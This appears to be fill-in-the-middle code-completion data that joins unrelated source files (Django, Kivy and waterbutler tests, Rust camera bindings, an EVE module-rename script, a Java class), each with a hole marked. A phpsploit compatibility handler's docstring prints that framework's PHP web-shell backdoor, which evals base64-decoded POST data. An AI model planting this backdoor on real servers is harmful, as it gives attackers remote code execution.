'%s%s.html' % (self.root_model_path, self.name)]
result = self.backend.get_layout_template_name(concrete, self.name)
self.assertEqual(expected, result)
def test_proxy_models_are_used(self):
model = ProxyFoo()
model_path = 'layout/%s/%s/' % \
(model._meta.app_label, model._meta.object_name.lower())
expected = [
'%s%s.html' % (model_path, self.name),
'%s%s.html' % (self.root_model_path, self.name)]<|fim▁hole|>
result = self.backend.get_layout_template_name(model, self.name)
self.assertEqual(expected, result)<|fim▁end|> | |
<|file_name|>test_file_handling_popup.py<|end_file_name|><|fim▁begin|>import unittest
from GUI.PopUps.FileHandlerPopUp import FileHandlerPopUp
from Constants.FileHandlingMode import *
<|fim▁hole|> self.callbackbuttontext = "button"
self.path = "test_path"
self.filters = ["*.jpg", "*.test"]
self.imported_files = []
self.selected_presentations = []
self.presentation_names = ["test1", "test2"]
self.open_project_layout = FileHandlerPopUp(title=self.title,
default_path=self.path,
callback=self.open_callback,
callback_button_text=self.callbackbuttontext,
file_handling_mode=OpenProject,
test_mode=True)
self.import_multiple_layout = FileHandlerPopUp(title=self.title,
default_path=self.path,
callback=self.import_multiple_callback,
callback_button_text=self.callbackbuttontext,
file_handling_mode=ImportMultipleFiles,
imported_files=self.imported_files,
selected_presentations=self.selected_presentations,
presentation_names=self.presentation_names,
filters=self.filters,
test_mode=True)
self.save_project_layout = FileHandlerPopUp(title=self.title,
default_path=self.path,
callback=self.save_callback,
callback_button_text=self.callbackbuttontext,
file_handling_mode=SaveProject,
test_mode=True)
def open_callback(self, path, list, filename):
pass
def save_callback(self, path, list, filename):
pass
def import_multiple_callback(self, path, list, filename):
pass
def test_callback_button_on_open_project_popup_1(self):
self.assertTrue(self.open_project_layout.ids.callback_button.disabled)
def test_callback_button_on_open_project_popup_2(self):
self.open_project_layout.ids.filechooser.selection.append("test")
self.open_project_layout.check_selections(None, None)
self.assertFalse(self.open_project_layout.ids.callback_button.disabled)
def test_callback_button_on_import_multiple_popup_1(self):
self.assertTrue(self.import_multiple_layout.ids.callback_button.disabled)
def test_callback_button_on_import_multiple_popup_2(self):
self.import_multiple_layout.ids.filechooser.selection.append("test")
self.import_multiple_layout.check_selections(None, None)
self.assertTrue(self.import_multiple_layout.ids.callback_button.disabled)
def test_callback_button_on_import_multiple_popup_3(self):
self.import_multiple_layout.selected_presentations.append("test")
self.import_multiple_layout.check_selections(None, None)
self.assertTrue(self.import_multiple_layout.ids.callback_button.disabled)
def test_callback_button_on_import_multiple_popup_4(self):
self.import_multiple_layout.ids.filechooser.selection.append("test")
self.import_multiple_layout.selected_presentations.append("test")
self.import_multiple_layout.check_selections(None, None)
self.assertFalse(self.import_multiple_layout.ids.callback_button.disabled)
def test_filename_input_with_valid_filename(self):
self.assertTrue(self.save_project_layout.ids.callback_button.disabled)
self.save_project_layout.check_filename(None, ".ekieki")
self.assertFalse(self.save_project_layout.ids.callback_button.disabled)
def test_filename_with_invalid_filename(self):
self.assertTrue(self.save_project_layout.ids.callback_button.disabled)
self.save_project_layout.check_filename(None, "\\ekieki")
self.assertTrue(self.save_project_layout.ids.callback_button.disabled)
def test_filename_with_empty_filename(self):
self.assertTrue(self.save_project_layout.ids.callback_button.disabled)
self.save_project_layout.check_filename(None, "")
self.assertTrue(self.save_project_layout.ids.callback_button.disabled)<|fim▁end|> | class TestFileHandlingPopUp(unittest.TestCase):
def setUp(self):
self.title = "test" |
<|file_name|>open_close.rs<|end_file_name|><|fim▁begin|>extern crate xiapi_sys;
extern crate libc;
use xiapi_sys::xiapi;
use libc::c_void;
use std::mem;
use std::ffi::CString;
fn run() -> Result<(),String> {
let mut numDevices = 0u32;
unsafe {
let result = xiapi::xiGetNumberDevices(&mut numDevices);
println!("xiGetNumberDevices:\treturn: {}\tvalue: {}", result, numDevices);
if numDevices == 0 {
return Err(String::from("no devices listed"));
}
let wIndex = 0;<|fim▁hole|> if (open_result != 0) {
return Err(String::from("Open XI_DEVICE failed"));
}
let mut width: i32 = 0;
let mut height: i32 = 0;
let mut data_format: i32 = 0;
// always use auto exposure/gain
let mut mvret = xiapi::xiSetParamInt( *handle, CString::new(xiapi::XI_PRM_AEAG).unwrap().as_ptr(), 1);
println!("set param result {}", mvret);
// always use auto white balance for color cameras
mvret = xiapi::xiSetParamInt( *handle, CString::new(xiapi::XI_PRM_AUTO_WB).unwrap().as_ptr(), 1);
println!("set param result {}", mvret);
mvret = xiapi::xiGetParamInt( *handle, CString::new(xiapi::XI_PRM_WIDTH).unwrap().as_ptr(), &mut width);
println!("get param result {}", mvret);
mvret = xiapi::xiGetParamInt( *handle, CString::new(xiapi::XI_PRM_HEIGHT).unwrap().as_ptr(), &mut height);
println!("get param result {}", mvret);
mvret = xiapi::xiGetParamInt(*handle, CString::new(xiapi::XI_PRM_IMAGE_DATA_FORMAT).unwrap().as_ptr(), &mut
data_format);
println!("get param result {}", mvret);
mvret = xiapi::xiSetParamInt( *handle, CString::new(xiapi::XI_PRM_BUFFER_POLICY).unwrap().as_ptr(), 1);
println!("set param result {}", mvret);
//mvret = xiSetParamInt( handle, XI_PRM_ACQ_TRANSPORT_BUFFER_SIZE, 96560128);
//HandleXiResult(mvret);
//mvret = xiSetParamInt( handle, XI_PRM_RECENT_FRAME, 0);
//HandleXiResult(mvret);
//default capture timeout 10s
let timeout = 10000;
}
//
// loop {
// let mut frame = core::mat();
// try!(cam.read(&mut frame));
// if try!(frame.size()).width > 0 {
// try!(highgui::imshow(window, &mut frame));
// }
// if try!(highgui::waitKey(10)) > 0 {
// break;
// }
// }
Ok(())
}
fn main() {
run().unwrap()
}<|fim▁end|> |
let handle: xiapi::PHANDLE = libc::malloc(mem::size_of::<xiapi::PHANDLE>() as libc::size_t) as xiapi::PHANDLE;
let open_result = xiapi::xiOpenDevice( wIndex, handle);
|
<|file_name|>fail-simple.rs<|end_file_name|><|fim▁begin|>// -*- rust -*-
// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.<|fim▁hole|>
// error-pattern:unexpected token
fn main() {
fail!(@);
}<|fim▁end|> | |
<|file_name|>0004_auto_20180313_1052.py<|end_file_name|><|fim▁begin|># Generated by Django 2.0.2 on 2018-03-13 02:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cc', '0003_auto_20180228_1145'),
]
operations = [
migrations.AlterField(
model_name='creditcard',
name='tail_no',
field=models.CharField(max_length=10),<|fim▁hole|><|fim▁end|> | ),
] |
<|file_name|>compose.spec.js<|end_file_name|><|fim▁begin|>const curry = require('../../curry');
const compose = require('..');
describe('Compose', () => {<|fim▁hole|> const prefixDr = curry((prefix, name) => `${prefix} ${name}`)('Dr');
const suffixBatchelor = curry((suffix, name) => `${name} ${suffix}`)('BSc');
const suffixMasters = curry((suffix, name) => `${name} ${suffix}`)('MSc');
const suffixDoctor = curry((suffix, name) => `${name} ${suffix}`)('PhD');
const composeName = compose([prefixDr, suffixDoctor, suffixMasters, suffixBatchelor]);
expect(composeName('Bob Johnson')).toEqual('Dr Bob Johnson BSc MSc PhD');
});
});<|fim▁end|> | test('should compose name', () => { |
<|file_name|>compat_handler.py<|end_file_name|><|fim▁begin|>"""Backwards compatible tunnel handler for
phpsploit v1 backdoors, aka:
<?php eval(base64_decode($_POST[%%PASSKEY%%])); ?>
"""
__all__ = ["Request_V1_x"]
from . import handler
from .exceptions import BuildError
class Request_V1_x(handler.Request):
<|fim▁hole|> super().__init__()
self.default_method = "POST"
def build_forwarder(self, method, decoder):
"""Assuming that phpsploit v1 uses POST data as payload container
without using an intermediate forwarder, this method shall
always return an empty dictionary.
"""
return {}
def load_multipart(self):
raise BuildError("Can't send multipart request in v1-compatible mode")
"""Force default method to POST, because only this one
was supported on phpsploit v1 versions.
""" |
<|file_name|>conversion.py<|end_file_name|><|fim▁begin|># Developed for module tiericide, this script will quickly print out a market
# conversion map based on patch notes, as well as database conversion mapping.
import argparse
import os.path
import sqlite3
import sys
# Add eos root path to sys.path so we can import ourselves
path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.realpath(os.path.join(path, "..")))
# change to correct conversion
rename_phrase = " is now known as "
conversion_phrase = " is being converted to "
text = """Partial Weapon Navigation is being converted to Phased Scoped Target Painter
Indirect Scanning Dampening Unit I is being converted to Phased Muon Scoped Sensor Dampener
'Broker' Remote Sensor Dampener I is being converted to 'Executive' Remote Sensor Dampener
Initiated Ion Field ECM I is being converted to Hypnos Scoped Magnetometric ECM
FZ-3 Subversive Spatial Destabilizer ECM is being converted to BZ-5 Scoped Gravimetric ECM
'Penumbra' White Noise ECM is being converted to Umbra Scoped Radar ECM
Faint Phase Inversion ECM I is being converted to Enfeebling Scoped Ladar ECM
'Hypnos' Multispectral ECM I is being converted to Compulsive Scoped Multispectral ECM
1Z-3 Subversive ECM Eruption is being converted to Cetus Scoped Burst Jammer
'Prayer' Remote Tracking Computer is being converted to P-S Compact Remote Tracking Computer
'Tycoon' Remote Tracking Computer is being converted to 'Enterprise' Remote Tracking Computer
Monopulse Tracking Mechanism I is being converted to F-12 Enduring Tracking Computer
'Orion' Tracking CPU I is being converted to Optical Compact Tracking Computer
'Economist' Tracking Computer I is being converted to 'Marketeer' Tracking Computer
Beta-Nought Tracking Mode is being converted to 'Basic' Tracking Enhancer
Azimuth Descalloping Tracking Enhancer is being converted to 'Basic' Tracking Enhancer
F-AQ Delay-Line Scan Tracking Subroutines is being converted to 'Basic' Tracking Enhancer
Beam Parallax Tracking Program is being converted to 'Basic' Tracking Enhancer
Sigma-Nought Tracking Mode I is being converted to Fourier Compact Tracking Enhancer
Auto-Gain Control Tracking Enhancer I is being converted to Fourier Compact Tracking Enhancer
F-aQ Phase Code Tracking Subroutines is being converted to Fourier Compact Tracking Enhancer
Lateral Gyrostabilizer is being converted to 'Basic' Gyrostabilizer
F-M2 Weapon Inertial Suspensor is being converted to 'Basic' Gyrostabilizer
Hydraulic Stabilization Actuator is being converted to 'Basic' Gyrostabilizer
Stabilized Weapon Mounts is being converted to 'Basic' Gyrostabilizer
Cross-Lateral Gyrostabilizer I is being converted to Counterbalanced Compact Gyrostabilizer
F-M3 Munition Inertial Suspensor is being converted to Counterbalanced Compact Gyrostabilizer
Pneumatic Stabilization Actuator I is being converted to Counterbalanced Compact Gyrostabilizer
Monophonic Stabilization Actuator I is being converted to 'Kindred' Gyrostabilizer
Monophonic Stabilization Actuator I Blueprint is being converted to 'Kindred' Gyrostabilizer Blueprint
Heat Exhaust System is being converted to 'Basic' Heat Sink
C3S Convection Thermal Radiator is being converted to 'Basic' Heat Sink
'Boreas' Coolant System is being converted to 'Basic' Heat Sink
Stamped Heat Sink is being converted to 'Basic' Heat Sink
Thermal Exhaust System I is being converted to Extruded Compact Heat Sink
C4S Coiled Circuit Thermal Radiator is being converted to Extruded Compact Heat Sink
'Skadi' Coolant System I is being converted to Extruded Compact Heat Sink
'Mangonel' Heat Sink I is being converted to 'Trebuchet' Heat Sink I
'Mangonel' Heat Sink I Blueprint is being converted to 'Trebuchet' Heat Sink Blueprint
Insulated Stabilizer Array is being converted to 'Basic' Magnetic Field Stabilizer
Linear Flux Stabilizer is being converted to 'Basic' Magnetic Field Stabilizer
Gauss Field Balancer is being converted to 'Basic' Magnetic Field Stabilizer
Magnetic Vortex Stabilizer is being converted to 'Basic' Magnetic Field Stabilizer
Insulated Stabilizer Array I is being converted to Vortex Compact Magnetic Field Stabilizer
Linear Flux Stabilizer I is being converted to Vortex Compact Magnetic Field Stabilizer
Gauss Field Balancer I is being converted to Vortex Compact Magnetic Field Stabilizer
'Capitalist' Magnetic Field Stabilizer I is being converted to 'Monopoly' Magnetic Field Stabilizer
'Capitalist' Magnetic Field Stabilizer I Blueprint is being converted to 'Monopoly' Magnetic Field Stabilizer Blueprint
Muon Coil Bolt Array I is being converted to Crosslink Compact Ballistic Control System
Multiphasic Bolt Array I is being converted to Crosslink Compact Ballistic Control System
'Pandemonium' Ballistic Enhancement is being converted to Crosslink Compact Ballistic Control System
Ballistic 'Purge' Targeting System I is being converted to 'Full Duplex' Ballistic Control System
Ballistic 'Purge' Targeting System I Blueprint is being converted to 'Full Duplex' Ballistic Control System Blueprint
'Langour' Drive Disruptor I is being converted to X5 Enduring Stasis Webifier
Patterned Stasis Web I is being converted to Fleeting Compact Stasis Webifier
Fleeting Progressive Warp Scrambler I is being converted to Faint Epsilon Scoped Warp Scrambler
Fleeting Warp Disruptor I is being converted to Faint Scoped Warp Disruptor
GLFF Containment Field is being converted to 'Basic' Damage Control
Interior Force Field Array is being converted to 'Basic' Damage Control
F84 Local Damage System is being converted to 'Basic' Damage Control
Systematic Damage Control is being converted to 'Basic' Damage Control
'Gonzo' Damage Control I is being converted to 'Radical' Damage Control
'Gonzo' Damage Control I Blueprint is being converted to 'Radical' Damage Control Blueprint
Emergency Damage Control I is being converted to IFFA Compact Damage Control
F85 Peripheral Damage System I is being converted to IFFA Compact Damage Control
Pseudoelectron Containment Field I is being converted to IFFA Compact Damage Control
Micro Ld-Acid Capacitor Battery I is being converted to 'Micro' Cap Battery
Micro Ohm Capacitor Reserve I is being converted to 'Micro' Cap Battery
Micro F-4a Ld-Sulfate Capacitor Charge Unit is being converted to 'Micro' Cap Battery
Micro Peroxide Capacitor Power Cell is being converted to 'Micro' Cap Battery
Micro Capacitor Battery II is being converted to 'Micro' Cap Battery
Small Ohm Capacitor Reserve I is being converted to Small Compact Pb-Acid Cap Battery
Small F-4a Ld-Sulfate Capacitor Charge Unit is being converted to Small Compact Pb-Acid Cap Battery
Small Peroxide Capacitor Power Cell is being converted to Small Compact Pb-Acid Cap Battery
Medium Ohm Capacitor Reserve I is being converted to Medium Compact Pb-Acid Cap Battery
Medium F-4a Ld-Sulfate Capacitor Charge Unit is being converted to Medium Compact Pb-Acid Cap Battery
Medium Peroxide Capacitor Power Cell is being converted to Medium Compact Pb-Acid Cap Battery
Large Ohm Capacitor Reserve I is being converted to Large Compact Pb-Acid Cap Battery
Large F-4a Ld-Sulfate Capacitor Charge Unit is being converted to Large Compact Pb-Acid Cap Battery
Large Peroxide Capacitor Power Cell is being converted to Large Compact Pb-Acid Cap Battery
ECCM - Radar I is being converted to Sensor Booster I
ECCM - Ladar I is being converted to Sensor Booster I
ECCM - Magnetometric I is being converted to Sensor Booster I
ECCM - Gravimetric I is being converted to Sensor Booster I
ECCM - Omni I is being converted to Sensor Booster I
ECCM - Radar I Blueprint is being converted to Sensor Booster I Blueprint
ECCM - Ladar I Blueprint is being converted to Sensor Booster I Blueprint
ECCM - Magnetometric I Blueprint is being converted to Sensor Booster I Blueprint
ECCM - Gravimetric I Blueprint is being converted to Sensor Booster I Blueprint
ECCM - Omni I Blueprint is being converted to Sensor Booster I Blueprint
Alumel Radar ECCM Sensor Array I is being converted to Alumel-Wired Enduring Sensor Booster
Alumel Ladar ECCM Sensor Array I is being converted to Alumel-Wired Enduring Sensor Booster
Alumel Gravimetric ECCM Sensor Array I is being converted to Alumel-Wired Enduring Sensor Booster
Alumel Omni ECCM Sensor Array I is being converted to Alumel-Wired Enduring Sensor Booster<|fim▁hole|>Supplemental Ladar ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Supplemental Gravimetric ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Supplemental Omni ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Supplemental Radar ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Supplemental Magnetometric ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Extra Radar ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Extra Ladar ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Extra Gravimetric ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Extra Magnetometric ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Gravimetric Positional ECCM Sensor System I is being converted to F-90 Compact Sensor Booster
Radar Positional ECCM Sensor System I is being converted to F-90 Compact Sensor Booster
Omni Positional ECCM Sensor System I is being converted to F-90 Compact Sensor Booster
Ladar Positional ECCM Sensor System I is being converted to F-90 Compact Sensor Booster
Magnetometric Positional ECCM Sensor System I is being converted to F-90 Compact Sensor Booster
Incremental Radar ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Incremental Ladar ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Incremental Gravimetric ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Incremental Magnetometric ECCM Scanning Array I is being converted to Alumel-Wired Enduring Sensor Booster
Prototype ECCM Radar Sensor Cluster is being converted to Alumel-Wired Enduring Sensor Booster
Prototype ECCM Ladar Sensor Cluster is being converted to Alumel-Wired Enduring Sensor Booster
Prototype ECCM Gravimetric Sensor Cluster is being converted to Alumel-Wired Enduring Sensor Booster
Prototype ECCM Omni Sensor Cluster is being converted to Alumel-Wired Enduring Sensor Booster
Prototype ECCM Magnetometric Sensor Cluster is being converted to Alumel-Wired Enduring Sensor Booster
Conjunctive Radar ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Conjunctive Ladar ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Conjunctive Gravimetric ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
Conjunctive Magnetometric ECCM Scanning Array I is being converted to F-90 Compact Sensor Booster
ECCM - Omni II is being converted to Sensor Booster II
ECCM - Gravimetric II is being converted to Sensor Booster II
ECCM - Ladar II is being converted to Sensor Booster II
ECCM - Magnetometric II is being converted to Sensor Booster II
ECCM - Radar II is being converted to Sensor Booster II
ECCM - Omni II Blueprint is being converted to Sensor Booster II Blueprint
ECCM - Gravimetric II Blueprint is being converted to Sensor Booster II Blueprint
ECCM - Ladar II Blueprint is being converted to Sensor Booster II Blueprint
ECCM - Magnetometric II Blueprint is being converted to Sensor Booster II Blueprint
ECCM - Radar II Blueprint is being converted to Sensor Booster II Blueprint
'Forger' ECCM - Magnetometric I is being converted to 'Shady' Sensor Booster
'Forger' ECCM - Magnetometric I Blueprint is being converted to 'Shady' Sensor Booster Blueprint
Basic RADAR Backup Array is being converted to 'Basic' Signal Amplifier
Basic Ladar Backup Array is being converted to 'Basic' Signal Amplifier
Basic Gravimetric Backup Array is being converted to 'Basic' Signal Amplifier
Basic Magnetometric Backup Array is being converted to 'Basic' Signal Amplifier
Basic Multi Sensor Backup Array is being converted to 'Basic' Signal Amplifier
Emergency Magnetometric Scanners is being converted to 'Basic' Signal Amplifier
Emergency Multi-Frequency Scanners is being converted to 'Basic' Signal Amplifier
Emergency RADAR Scanners is being converted to 'Basic' Signal Amplifier
Emergency Ladar Scanners is being converted to 'Basic' Signal Amplifier
Emergency Gravimetric Scanners is being converted to 'Basic' Signal Amplifier
Sealed RADAR Backup Cluster is being converted to 'Basic' Signal Amplifier
Sealed Magnetometric Backup Cluster is being converted to 'Basic' Signal Amplifier
Sealed Multi-Frequency Backup Cluster is being converted to 'Basic' Signal Amplifier
Sealed Ladar Backup Cluster is being converted to 'Basic' Signal Amplifier
Sealed Gravimetric Backup Cluster is being converted to 'Basic' Signal Amplifier
Surplus RADAR Reserve Array is being converted to 'Basic' Signal Amplifier
F-42 Reiterative RADAR Backup Sensors is being converted to 'Basic' Signal Amplifier
Surplus Magnetometric Reserve Array is being converted to 'Basic' Signal Amplifier
F-42 Reiterative Magnetometric Backup Sensors is being converted to 'Basic' Signal Amplifier
Surplus Multi-Frequency Reserve Array is being converted to 'Basic' Signal Amplifier
F-42 Reiterative Multi-Frequency Backup Sensors is being converted to 'Basic' Signal Amplifier
Surplus Ladar Reserve Array is being converted to 'Basic' Signal Amplifier
F-42 Reiterative Ladar Backup Sensors is being converted to 'Basic' Signal Amplifier
Surplus Gravimetric Reserve Array is being converted to 'Basic' Signal Amplifier
F-42 Reiterative Gravimetric Backup Sensors is being converted to 'Basic' Signal Amplifier
Gravimetric Backup Array I is being converted to Signal Amplifier I
Ladar Backup Array I is being converted to Signal Amplifier I
Magnetometric Backup Array I is being converted to Signal Amplifier I
Multi Sensor Backup Array I is being converted to Signal Amplifier I
RADAR Backup Array I is being converted to Signal Amplifier I
Gravimetric Backup Array I Blueprint is being converted to Signal Amplifier I Blueprint
Ladar Backup Array I Blueprint is being converted to Signal Amplifier I Blueprint
Magnetometric Backup Array I Blueprint is being converted to Signal Amplifier I Blueprint
Multi Sensor Backup Array I Blueprint is being converted to Signal Amplifier I Blueprint
RADAR Backup Array I Blueprint is being converted to Signal Amplifier I Blueprint
Protected Gravimetric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Protected Ladar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Protected Magnetometric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Protected Multi-Frequency Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Protected RADAR Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Reserve Gravimetric Scanners is being converted to F-89 Compact Signal Amplifier
Reserve Ladar Scanners is being converted to F-89 Compact Signal Amplifier
Reserve Magnetometric Scanners is being converted to F-89 Compact Signal Amplifier
Reserve Multi-Frequency Scanners is being converted to F-89 Compact Signal Amplifier
Reserve RADAR Scanners is being converted to F-89 Compact Signal Amplifier
Secure Gravimetric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Secure Ladar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Secure Magnetometric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Secure Radar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
F-43 Repetitive Gravimetric Backup Sensors is being converted to F-89 Compact Signal Amplifier
F-43 Repetitive Ladar Backup Sensors is being converted to F-89 Compact Signal Amplifier
F-43 Repetitive Magnetometric Backup Sensors is being converted to F-89 Compact Signal Amplifier
F-43 Repetitive Multi-Frequency Backup Sensors is being converted to F-89 Compact Signal Amplifier
F-43 Repetitive RADAR Backup Sensors is being converted to F-89 Compact Signal Amplifier
Shielded Gravimetric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Shielded Ladar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Shielded Magnetometric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Shielded Radar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Surrogate Gravimetric Reserve Array I is being converted to F-89 Compact Signal Amplifier
Surrogate Ladar Reserve Array I is being converted to F-89 Compact Signal Amplifier
Surrogate Magnetometric Reserve Array I is being converted to F-89 Compact Signal Amplifier
Surrogate Multi-Frequency Reserve Array I is being converted to F-89 Compact Signal Amplifier
Surrogate RADAR Reserve Array I is being converted to F-89 Compact Signal Amplifier
Warded Gravimetric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Warded Ladar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Warded Magnetometric Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Warded Radar Backup Cluster I is being converted to F-89 Compact Signal Amplifier
Gravimetric Backup Array II is being converted to Signal Amplifier II
Ladar Backup Array II is being converted to Signal Amplifier II
Magnetometric Backup Array II is being converted to Signal Amplifier II
Multi Sensor Backup Array II is being converted to Signal Amplifier II
RADAR Backup Array II is being converted to Signal Amplifier II
Gravimetric Backup Array II Blueprint is being converted to Signal Amplifier II Blueprint
Ladar Backup Array II Blueprint is being converted to Signal Amplifier II Blueprint
Magnetometric Backup Array II Blueprint is being converted to Signal Amplifier II Blueprint
Multi Sensor Backup Array II Blueprint is being converted to Signal Amplifier II Blueprint
RADAR Backup Array II Blueprint is being converted to Signal Amplifier II Blueprint
Gravimetric Firewall is being converted to 'Firewall' Signal Amplifier
Ladar Firewall is being converted to 'Firewall' Signal Amplifier
Magnetometric Firewall is being converted to 'Firewall' Signal Amplifier
Multi Sensor Firewall is being converted to 'Firewall' Signal Amplifier
RADAR Firewall is being converted to 'Firewall' Signal Amplifier
ECCM Projector I is being converted to Remote Sensor Booster I
ECCM Projector I Blueprint is being converted to Remote Sensor Booster I Blueprint
Scattering ECCM Projector I is being converted to Linked Enduring Sensor Booster
Piercing ECCM Emitter I is being converted to Coadjunct Scoped Remote Sensor Booster
Spot Pulsing ECCM I is being converted to F-23 Compact Remote Sensor Booster
Phased Muon ECCM Caster I is being converted to F-23 Compact Remote Sensor Booster
ECCM Projector II is being converted to Remote Sensor Booster II
ECCM Projector II Blueprint is being converted to Remote Sensor Booster II Blueprint
Prototype Sensor Booster is being converted to Alumel-Wired Enduring Sensor Booster
Supplemental Scanning CPU I is being converted to F-90 Compact Sensor Booster
Amplitude Signal Enhancer is being converted to 'Basic' Signal Amplifier
'Acolyth' Signal Booster is being converted to 'Basic' Signal Amplifier
Type-E Discriminative Signal Augmentation is being converted to 'Basic' Signal Amplifier
F-90 Positional Signal Amplifier is being converted to 'Basic' Signal Amplifier
'Mendicant' Signal Booster I is being converted to F-89 Compact Signal Amplifier
Wavelength Signal Enhancer I is being converted to F-89 Compact Signal Amplifier
Type-D Attenuation Signal Augmentation is being converted to F-89 Compact Signal Amplifier
Connected Remote Sensor Booster is being converted to F-23 Compact Remote Sensor Booster
'Boss' Remote Sensor Booster is being converted to 'Bootleg' Remote Sensor Booster
'Entrepreneur' Remote Sensor Booster is being converted to 'Bootleg' Remote Sensor Booster
'Pacifier' Large Remote Armor Repairer is being converted to 'Peace' Large Remote Armor Repairer
'Pacifier' Large Remote Armor Repairer Blueprint is being converted to 'Peace' Large Remote Armor Repairer Blueprint
'Broker' Remote Sensor Dampener I Blueprint is being converted to 'Executive' Remote Sensor Dampener Blueprint
'Tycoon' Remote Tracking Computer Blueprint is being converted to 'Enterprise' Remote Tracking Computer Blueprint
'Economist' Tracking Computer I Blueprint is being converted to 'Marketeer' Tracking Computer Blueprint"""
def main(old, new):
# Open both databases and get their cursors
old_db = sqlite3.connect(os.path.expanduser(old))
old_cursor = old_db.cursor()
new_db = sqlite3.connect(os.path.expanduser(new))
new_cursor = new_db.cursor()
renames = {}
conversions = {}
for x in text.splitlines():
if conversion_phrase in x:
c = x.split(conversion_phrase)
container = conversions
elif rename_phrase in x:
c = x.split(rename_phrase)
container = renames
else:
print("Unknown format: {}".format(x))
sys.exit()
old_name, new_name = c[0], c[1]
old_item, new_item = None, None
if "Blueprint" in old_name or "Blueprint" in new_name:
print("Blueprint: Skipping this line: %s"%x)
continue
# gather item info
new_cursor.execute('SELECT "typeID" FROM "invtypes" WHERE "typeName" = ?', (new_name,))
for row in new_cursor:
new_item = row[0]
break
old_cursor.execute('SELECT "typeID" FROM "invtypes" WHERE "typeName" = ?', (old_name,))
for row in old_cursor:
old_item = row[0]
break
if not old_item:
print("Error finding old item in {} -> {}".format(old_name, new_name))
if not new_item:
print("Error finding new item in {} -> {}".format(old_name, new_name))
container.setdefault((new_item, new_name), []).append((old_item, old_name))
print(" # Renamed items")
for new, old in renames.items():
if len(old) != 1:
print("Incorrect length, key: {}, value: {}".format(new, old))
sys.exit()
old = old[0]
print(" \"{}\": \"{}\",".format(old[1], new[1]))
# Convert modules
print("\n # Converted items")
for new, olds in conversions.items():
for old in olds:
print(" \"{}\": \"{}\",".format(old[1], new[1]))
print()
print()
for new, old in conversions.items():
print(" {}: ( # {}".format(new[0], new[1]))
for item in old:
print(" {}, # {}".format(item[0], item[1]))
print(" ),")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--old", type=str)
parser.add_argument("-n", "--new", type=str)
args = parser.parse_args()
main(args.old, args.new)<|fim▁end|> | Alumel Magnetometric ECCM Sensor Array I is being converted to Alumel-Wired Enduring Sensor Booster |
<|file_name|>test_zip.py<|end_file_name|><|fim▁begin|>import io<|fim▁hole|>from waterbutler.core import streams
from waterbutler.core.utils import AsyncIterator
from tests import utils
class TestZipHandler(utils.HandlerTestCase):
HOOK_PATH = 'waterbutler.server.api.v0.zip.ZipHandler._send_hook'
@testing.gen_test
def test_download_stream(self):
data = b'freddie brian john roger'
stream = streams.StringStream(data)
stream.content_type = 'application/octet-stream'
zipstream = streams.ZipStreamReader(AsyncIterator([('file.txt', stream)]))
self.mock_provider.zip = utils.MockCoroutine(return_value=zipstream)
resp = yield self.http_client.fetch(
self.get_url('/zip?provider=queenhub&path=/freddie.png'),
)
zip = zipfile.ZipFile(io.BytesIO(resp.body))
assert zip.testzip() is None
assert zip.open('file.txt').read() == data<|fim▁end|> | import zipfile
from tornado import testing
|
<|file_name|>TrialParamValue.java<|end_file_name|><|fim▁begin|>package org.adligo.tests4j.system.shared.trials;
import org.adligo.tests4j.shared.common.ClassMethods;
import org.adligo.tests4j.shared.xml.I_XML_Builder;
public class TrialParamValue implements I_TrialParamValue {
public static final String TAG_NAME = "value";
public static final String CLASS_NAME = "class";
public static final String PARAMETER_VALUE_MUST_BE_A_NON_VOID_PRIMITIVE_OR_STRING =
"Parameter value must be a non Void primitive or String.";
private Object value_;
public TrialParamValue(Object value) {
if (value == null) {
throw new NullPointerException();
}
Class<?> c = value.getClass();
if ( (ClassMethods.isPrimitiveClass(c) && !ClassMethods.isClass(Void.class, c))
|| ClassMethods.isClass(String.class, c)) {
value_ = value;
} else {
throw new IllegalArgumentException(
PARAMETER_VALUE_MUST_BE_A_NON_VOID_PRIMITIVE_OR_STRING);
}
}
@Override
public String getClassName() {
return value_.getClass().getName();
}
@Override
public Object getValue() {
return value_;
}
@Override
public void toXml(I_XML_Builder builder) {
builder.addIndent();
builder.addStartTag(TAG_NAME);
String name = ClassMethods.getSimpleName(value_.getClass());
builder.addAttribute(CLASS_NAME, name);
